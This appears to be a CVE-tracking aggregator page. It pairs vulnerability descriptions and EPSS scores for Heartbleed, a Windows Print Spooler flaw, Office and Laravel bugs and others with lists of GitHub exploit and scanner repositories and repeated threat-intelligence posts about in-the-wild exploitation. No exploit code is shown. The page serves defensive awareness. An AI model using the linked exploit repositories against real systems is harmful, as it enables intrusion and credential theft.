CVE-2014-0160
(7.5 HIGH)

EPSS: 97.48%

updated 2023-02-18T05:04:47

2 posts

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

65 repos

https://github.com/hybridus/heartbleedscanner

https://github.com/c0d3cr4f73r/CVE-2014-0160_Heartbleed

https://github.com/cheese-hub/heartbleed

https://github.com/BelminD/heartbleed

https://github.com/wwwiretap/bleeding_onions

https://github.com/artofscripting-zz/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS

https://github.com/GeeksXtreme/ssl-heartbleed.nse

https://github.com/jdauphant/patch-openssl-CVE-2014-0160

https://github.com/DominikTo/bleed

https://github.com/obayesshelton/CVE-2014-0160-Scanner

https://github.com/a0726h77/heartbleed-test

https://github.com/MrE-Fog/CVE-2014-0160-Chrome-Plugin

https://github.com/undacmic/heartbleed-proof-of-concept

https://github.com/zouguangxian/heartbleed

https://github.com/yryz/heartbleed.js

https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin

https://github.com/pierceoneill/bleeding-heart

https://github.com/indiw0rm/-Heartbleed-

https://github.com/timsonner/cve-2014-0160-heartbleed

https://github.com/vortextube/ssl_scanner

https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx

https://github.com/cldme/heartbleed-bug

https://github.com/ThanHuuTuan/Heartexploit

https://github.com/Saymeis/HeartBleed

https://github.com/idkqh7/heatbleeding

https://github.com/einaros/heartbleed-tools

https://github.com/cved-sources/cve-2014-0160

https://github.com/iwaffles/heartbleed-test.crx

https://github.com/pblittle/aws-suture

https://github.com/GardeniaWhite/fuzzing

https://github.com/PinkP4nther/Heartbleed_PoC

https://github.com/musalbas/heartbleed-masstest

https://github.com/OffensivePython/HeartLeak

https://github.com/cbk914/heartbleed-checker

https://github.com/ingochris/heartpatch.us

https://github.com/rouze-d/heartbleed

https://github.com/Lekensteyn/pacemaker

https://github.com/xanas/heartbleed.py

https://github.com/proactiveRISK/heartbleed-extention

https://github.com/titanous/heartbleeder

https://github.com/GuillermoEscobero/heartbleed

https://github.com/waqasjamal-zz/HeartBleed-Vulnerability-Checker

https://github.com/DisK0nn3cT/MaltegoHeartbleed

https://github.com/0x90/CVE-2014-0160

https://github.com/cyphar/heartthreader

https://github.com/sensepost/heartbleed-poc

https://github.com/mpgn/heartbleed-PoC

https://github.com/hreese/heartbleed-dtls

https://github.com/marstornado/cve-2014-0160-Yunfeng-Jiang

https://github.com/siddolo/knockbleed

https://github.com/isgroup/openmagic

https://github.com/FiloSottile/Heartbleed

https://github.com/WildfootW/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed

https://github.com/ice-security88/CVE-2014-0160

https://github.com/amerine/coronary

https://github.com/caiqiqi/OpenSSL-HeartBleed-CVE-2014-0160-PoC

https://github.com/roganartu/heartbleedchecker-chrome

https://github.com/iSCInc/heartbleed

https://github.com/takeshixx/ssl-heartbleed.nse

https://github.com/hmlio/vaas-cve-2014-0160

https://github.com/fb1h2s/CVE-2014-0160

https://github.com/mozilla-services/Heartbleed

https://github.com/xlucas/heartbleed

https://github.com/sammyfung/openssl-heartbleed-fix

https://github.com/anthophilee/A2SV--SSL-VUL-Scan

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2022-38028
(7.8 HIGH)

EPSS: 0.05%

updated 2023-02-03T05:02:37

15 posts

Windows Print Spooler Elevation of Privilege Vulnerability.

screaminggoat at 2024-04-23T15:32:24.451Z ##

@ntkramer gonna enrich your toot with my reply: Microsoft article
What I took out of it was APT28's tool GooseEgg exploited CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months to 3 years 6 months.

To that end, CISA added CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog today: cisa.gov/news-events/alerts/20

##

screaminggoat at 2024-04-23T15:00:13.500Z ##

Hot off the press! CISA adds CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog after Microsoft's blog post states that Russian APT28 exploited it as a zero-day for years. 🔗cisa.gov/news-events/alerts/20

##

jos1264@social.skynetcloud.site at 2024-04-23T14:35:04.000Z ##

Russian hackers’ custom tool exploits old Windows Print Spooler flaw (CVE-2022-38028) helpnetsecurity.com/2024/04/23 #cyberespionage #Don'tmiss #Microsoft #Hotstuff #exploit #Windows #0-day #News #APT #CVE

##

jbhall56 at 2024-04-23T11:49:48.287Z ##

The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8). thehackernews.com/2024/04/russ

##

screaminggoat at 2024-04-22T18:47:57.544Z ##

@mttaggart I think one of the key takeaways is that APT28, a Russian state actor publicly attributed to GRU Military Unit 26165, exploited CVE-2022-38028 as a zero-day for 2 years before it was publicly disclosed and patched:

Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.

##

cR0w at 2024-04-22T18:40:23.488Z ##

@dangoodin Should your post read CVE-2022-38028?

##

dangoodin at 2024-04-22T17:43:54.694Z ##

Microsoft said today that Russian hackers have been exploiting the vulnerability tracked as CVE-2022-38028 since at least 2020. That would make it an 0day at the time Microsoft patched it in October 2022. And yet, Microsoft has never acknowledged that vulnerability as such. What's up with that?

microsoft.com/en-us/security/b

msrc.microsoft.com/update-guid

##

screaminggoat at 2024-04-22T16:54:45.253Z ##

Microsoft reported that APT28 (Fancy Bear, Forest Blizzard) used a custom tool to elevate privileges and steal credentials in compromised networks. This GooseEgg tool leveraged CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months. APT28 is publicly attributed to Russian General Staff Main Intelligence Directorate (GRU). IOC provided. 🔗 microsoft.com/en-us/security/b

cc: @serghei @campuscodi @briankrebs @jwarminsky

##

screaminggoat@infosec.exchange at 2024-04-23T15:32:24.000Z ##

@ntkramer gonna enrich your toot with my reply: Microsoft article
What I took out of it was APT28's tool GooseEgg exploited CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months to 3 years 6 months.

To that end, CISA added CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog today: cisa.gov/news-events/alerts/20

#CVE_2022_38028 #APT28 #KEV

##

screaminggoat@infosec.exchange at 2024-04-23T15:00:13.000Z ##

Hot off the press! CISA adds CVE-2022-38028 to the Known Exploited Vulnerabilities (KEV) Catalog after Microsoft's blog post states that Russian APT28 exploited it as a zero-day for years. 🔗cisa.gov/news-events/alerts/20

#CVE_2022_38028 #eitw #activeexploitation #kev #CISA #KnownExploitedVulnerabilitiesCatalog #Russia #cyberespionage #threatintel

##

jbhall56@infosec.exchange at 2024-04-23T11:49:48.000Z ##

The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for privilege escalation (CVE-2022-38028, CVSS score: 7.8). thehackernews.com/2024/04/russ

##

simontsui@infosec.exchange at 2024-04-22T18:47:57.000Z ##

@mttaggart I think one of the key takeaways is that APT28, a Russian state actor publicly attributed to GRU Military Unit 26165, exploited CVE-2022-38028 as a zero-day for 2 years before it was publicly disclosed and patched:

Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.

##

cR0w@infosec.exchange at 2024-04-22T18:40:23.000Z ##

@dangoodin Should your post read CVE-2022-38028?

##

dangoodin@infosec.exchange at 2024-04-22T17:43:54.000Z ##

Microsoft said today that Russian hackers have been exploiting the vulnerability tracked as CVE-2022-38028 since at least 2020. That would make it an 0day at the time Microsoft patched it in October 2022. And yet, Microsoft has never acknowledged that vulnerability as such. What's up with that?

microsoft.com/en-us/security/b

msrc.microsoft.com/update-guid

##

simontsui@infosec.exchange at 2024-04-22T16:54:45.000Z ##

Microsoft reported that APT28 (Fancy Bear, Forest Blizzard) used a custom tool to elevate privileges and steal credentials in compromised networks. This GooseEgg tool leveraged CVE-2022-38028 (7.8 high, disclosed 11 October 2022 by Microsoft; Windows Print Spooler Elevation of Privilege Vulnerability) as a zero-day since at least June 2020 (possibly as early as April 2019) which was 2 years 4 months. APT28 is publicly attributed to Russian General Staff Main Intelligence Directorate (GRU). IOC provided. 🔗 microsoft.com/en-us/security/b

cc: @serghei @campuscodi @briankrebs @jwarminsky

#APT28 #cyberespionage #Russia #FancyBear #ForestBlizzard #CVE_2022_38028 #eitw #activeexploitation #GooseEgg

##

CVE-2017-8570
(7.8 HIGH)

EPSS: 97.34%

updated 2023-02-02T05:01:39

6 posts

Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243.

9 repos

https://github.com/SwordSheath/CVE-2017-8570

https://github.com/Drac0nids/CVE-2017-8570

https://github.com/5l1v3r1/rtfkit

https://github.com/MaxSecurity/Office-CVE-2017-8570

https://github.com/temesgeny/ppsx-file-generator

https://github.com/sasqwatch/CVE-2017-8570

https://github.com/erfze/CVE-2017-8570

https://github.com/rxwx/CVE-2017-8570

https://github.com/erfze/CVE-2017-0261

screaminggoat at 2024-04-27T13:36:40.270Z ##

Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.

##

screaminggoat@infosec.exchange at 2024-04-27T13:36:40.000Z ##

Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.

#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570

##

screaminggoat at 2024-04-27T13:36:40.270Z ##

Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.

##

screaminggoat@infosec.exchange at 2024-04-27T13:36:40.000Z ##

Deep Instinct: Uncorking Old Wine: Zero-Day from 2017 + Cobalt Strike Loader in Unholy Alliance
A targeted operation against Ukraine by an unknown threat actor leveraged CVE-2017-8570 (7.8 high, disclosed 11 July 2017 by Microsoft, Microsoft Office RCE) for initial access. The decoy is a PPSX (PowerPoint Slideshow) file of a U.S. Army tank-mounted mine clearing blades manual. There are two stages in the infection chain, with the payload disguised as Cisco AnyConnect VPN file and the loader serves up a Cobalt Strike Beacon. Deep Instinct provides a technical analysis of the DLL, loader, and Cobalt Strike configs. IOC and MITRE ATT&CK TTPs listed.

#Ukraine #cyberespionage #threatintel #IOC #CobaltStrike #CVE_2017_8570

##

jbhall56 at 2024-04-29T11:49:15.137Z ##

The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. darkreading.com/cyberattacks-d

##

jbhall56@infosec.exchange at 2024-04-29T11:49:15.000Z ##

The targeted operation utilized CVE-2017-8570 as the initial vector and employed a notable custom loader for Cobalt Strike, yet attribution to any known threat actor remains elusive. darkreading.com/cyberattacks-d

##

CVE-2021-3129
(9.8 CRITICAL)

EPSS: 97.46%

updated 2023-02-01T05:05:19

2 posts

Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.

Nuclei template

28 repos

https://github.com/ambionics/laravel-exploits

https://github.com/simonlee-hello/CVE-2021-3129

https://github.com/hupe1980/CVE-2021-3129

https://github.com/shadowabi/Laravel-CVE-2021-3129

https://github.com/qaisarafridi/cve-2021-31290

https://github.com/withmasday/CVE-2021-3129

https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129

https://github.com/zhzyker/vulmap

https://github.com/ajisai-babu/CVE-2021-3129-exp

https://github.com/Zoo1sondv/CVE-2021-3129

https://github.com/qaisarafridi/cve-2021-3129

https://github.com/joshuavanderpoll/CVE-2021-3129

https://github.com/nth347/CVE-2021-3129_exploit

https://github.com/Axianke/CVE-2021-3129

https://github.com/0nion1/CVE-2021-3129

https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

https://github.com/zhzyker/CVE-2021-3129

https://github.com/MadExploits/Laravel-debug-Checker

https://github.com/JacobEbben/CVE-2021-3129

https://github.com/miko550/CVE-2021-3129

https://github.com/keyuan15/CVE-2021-3129

https://github.com/cuongtop4598/CVE-2021-3129-Script

https://github.com/aurelien-vilminot/ENSIMAG_EXPLOIT_CVE2_3A

https://github.com/SNCKER/CVE-2021-3129

https://github.com/idea-oss/laravel-CVE-2021-3129-EXP

https://github.com/knqyf263/CVE-2021-3129

https://github.com/crisprss/Laravel_CVE-2021-3129_EXP

screaminggoat at 2024-04-25T14:29:48.036Z ##

Sysdig: LLMjacking: Stolen Cloud Credentials Used in New AI Attack
Sysdig reported on a cloud-based campaign leveraging stolen cloud credentials to target 10 cloud-hosted large language model (LLM) services. The goal is selling access and this attack is called "LLMjacking." (seriously who comes up with these stupid names? this better not show up in the next version of the CEH exam) Sysdig notes CVE-2021-3129 (9.8 critical, disclosed 12 January 2021, added to KEV Catalog 18 September 2023) was exploited to get credentials. Once initial access was obtained, the attackers exfiltrated cloud credentials and pivoted to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. Sysdig provides a technical analysis and IOC.

##

screaminggoat@infosec.exchange at 2024-04-25T14:29:48.000Z ##

Sysdig: LLMjacking: Stolen Cloud Credentials Used in New AI Attack
Sysdig reported on a cloud-based campaign leveraging stolen cloud credentials to target 10 cloud-hosted large language model (LLM) services. The goal is selling access and this attack is called "LLMjacking." (seriously who comes up with these stupid names? this better not show up in the next version of the CEH exam) Sysdig notes CVE-2021-3129 (9.8 critical, disclosed 12 January 2021, added to KEV Catalog 18 September 2023) was exploited to get credentials. Once initial access was obtained, the attackers exfiltrated cloud credentials and pivoted to the cloud environment, where they attempted to access local LLM models hosted by cloud providers. Sysdig provides a technical analysis and IOC.

#LLMjacking #CVE_2021_3129 #threatintel #IOC

##

CVE-2006-4304(CVSS UNKNOWN)

EPSS: 6.64%

updated 2023-02-01T05:01:22

4 posts

Buffer overflow in the sppp driver in FreeBSD 4.11 through 6.1, NetBSD 2.0 through 4.0 beta before 20060823, and OpenBSD 3.8 and 3.9 before 20060902 allows remote attackers to cause a denial of service (panic), obtain sensitive information, and possibly execute arbitrary code via crafted Link Control Protocol (LCP) packets with an option length that exceeds the overall length, which triggers the o

decio at 2024-04-26T12:03:47.458Z ##

Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!

"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
hackerone.com/reports/2177925

"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
wololo.net/2024/04/26/ps4-ps5-

##

decio@infosec.exchange at 2024-04-26T12:03:47.000Z ##

Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!

"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
hackerone.com/reports/2177925

"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
wololo.net/2024/04/26/ps4-ps5-

#CVE_2006_4304 #PS5Share

##

decio at 2024-04-26T12:03:47.458Z ##

Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!

"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
hackerone.com/reports/2177925

"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
wololo.net/2024/04/26/ps4-ps5-

##

decio@infosec.exchange at 2024-04-26T12:03:47.000Z ##

Tiens, le pwnage de la PlayStation, discuté depuis le début de l'année, repose sur une faille de sécurité datant de 2006!

"For some reason, the PS4/PS5 is vulnerable to CVE-2006-4304. By having invalid options, it is possible to cause a heap buffer overwrite and overread."
👇
hackerone.com/reports/2177925

"PS4/PS5: TheFloW discloses Kernel vulnerability relying on old bug from 2006, impacts PS4 up to 11.00 & PS5 up to 8.20, more details in May"
👇
wololo.net/2024/04/26/ps4-ps5-

#CVE_2006_4304 #PS5Share

##

CVE-2021-21975(CVSS UNKNOWN)

EPSS: 97.40%

updated 2023-01-29T05:07:01

4 posts

Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.

Nuclei template

10 repos

https://github.com/dorkerdevil/CVE-2021-21975

https://github.com/zhzyker/vulmap

https://github.com/CyberCommands/CVE2021-21975

https://github.com/GuayoyoCyber/CVE-2021-21975

https://github.com/Vulnmachines/VMWare-CVE-2021-21975

https://github.com/Al1ex/CVE-2021-21975

https://github.com/Henry4E36/VMWare-vRealize-SSRF

https://github.com/TheTh1nk3r/exp_hub

https://github.com/murataydemir/CVE-2021-21975

https://github.com/rabidwh0re/REALITY_SMASHER

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2021-26887
(7.8 HIGH)

EPSS: 0.06%

updated 2023-01-29T05:06:49

2 posts

Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability

oversecurity@mastodon.social at 2024-04-29T16:10:04.000Z ##

Group Policy Folder Redirection CVE-2021-26887

Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with...

🔗️ [Decoder] link.is.it/bp55iz

##

oversecurity@mastodon.social at 2024-04-29T16:10:04.000Z ##

Group Policy Folder Redirection CVE-2021-26887

Two years ago (march 2020), I found this sort of “vulnerability” in Folder Redirection policy and reported it to MSRC. They acknowledged it with...

🔗️ [Decoder] link.is.it/bp55iz

##

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

#SMB #cybersecurity #vulnerability #CVE_2021_44228 #CVE_2018_13379 #CVE_2014_0160 #CVE_2021_26085 #CVE_2021_21975

##

CVE-2021-26085
(5.3 MEDIUM)

EPSS: 96.32%

updated 2023-01-27T05:03:06

4 posts

Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.

Nuclei template

2 repos

https://github.com/zeroc00I/CVE-2021-26085

https://github.com/ColdFusionX/CVE-2021-26085

screaminggoat at 2024-04-30T14:02:23.382Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
  • VMware SSRF CVE-2021-21975 (7.5 high, disclosed 31 March 2021)

##

screaminggoat@infosec.exchange at 2024-04-30T14:02:23.000Z ##

SonicWall: Vintage Bugs: Data Shows Old Vulnerabilities Still Menace Small Businesses
For small to medium businesses (SMB), SonicWall says that the top five most widespread network attacks used were 3-10 old vulnerabilities. SonicWall suggests that attackers are more likely to take the easiest path to obtain their end goal.

  • Log4j CVE-2021-44228 (10.0 critical, disclosed 10 December 2021 as exploited zero day)
  • Fortinet SSL VPN CVE-2018-13379 (9.8 critical, disclosed 04 June 2018)
  • Heartbleed CVE-2014-0160 (7.5 high, disclosed 07 April 2014)
  • Atlassian Preauth AFR CVE-2021-26085 (5.3 medium, disclosed 02 August 2021)
